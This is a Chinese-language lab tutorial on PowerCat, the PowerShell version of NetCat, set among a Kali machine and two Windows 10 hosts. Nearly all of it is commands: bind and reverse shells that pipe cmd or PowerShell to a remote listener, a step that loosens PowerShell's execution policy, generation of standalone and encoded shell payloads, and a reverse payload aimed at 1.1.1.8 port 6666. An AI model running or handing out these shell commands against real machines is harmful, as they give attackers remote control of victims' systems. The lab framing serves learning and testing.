PowerCat是NetCat的PowerShell形式,所以,PowerCat可以无缝的和Netcat连接。下载地址:https://github.com/besimorhino/powercat
下载后以管理员权限运行Powershell,输入Import-Module ./powercat.ps1报错,再输入Set-ExecutionPolicy RemoteSigned,然后选择“Y”即可。
kali:192.168.58.134
Windows 10(1):172.17.0.67
Windows 10(2):192.168.58.129
⚪简单通信
Kali中运行:
nc -l -p 5678 -v
使用win10的powercat去连接它:
powercat -c 192.168.58.134 -p 5678 -v
⚪正向shell(windows-linux)
首先在win10中运行:
powercat -l -p 2333 -e cmd -v
在Kali中使用nc去连接shell:
nc 172.17.0.67 2333 -v
⚪反向shell(windows-linux)
首先在kali中运行:
nc -lvp 8043
win10将本地上的cmd.exe程序连接到kali的8043端口:
powercat -c 192.168.58.134 -p 8043 -e cmd
⚪反向shell(windows-windows)
在Windows 10(2)中运行:
powercat -l -p 8047 -v
使用Windows 10(1)将其本地上的PowerShell连接到Windows 10(2)中:
powercat -c 192.168.58.129 -p 8047 -v -ep
⚪传输文件(测试失败)
Windows 10(2)接收文件:
powercat -l -p 9977 -of test.txt -v
Windows10(1)传输文件:
powercat -c 192.168.58.129 -p 9977 -i E:\tool\WEB\powercat-master\test.txt -v
-i 指定要上传文件的绝对路径
-of 接受文件的路径以及名称
有成功的可以联系我,告诉我为啥错了,感谢T T。
⚪生成Payload
在Windows 10(1)下执行如下命令:
powercat -l -p 8084 -e cmd -v -g >> shell.ps1
将生成的shell.ps1放入Windows 10(2)下并执行。
然后在Windows 10(1)下执行如下命令即可获得shell:
powercat -c 192.168.58.129 -p 8084 -v
补充两点:
可以对生成的Payload进行编码:
powercat -c [IP] -p [PORT] -ep -ge
生成一个反向连接的payload,可以链接到1.1.1.8的6666端口:
powercat -c 1.1.1.8 -p 6666 -e cmd -g
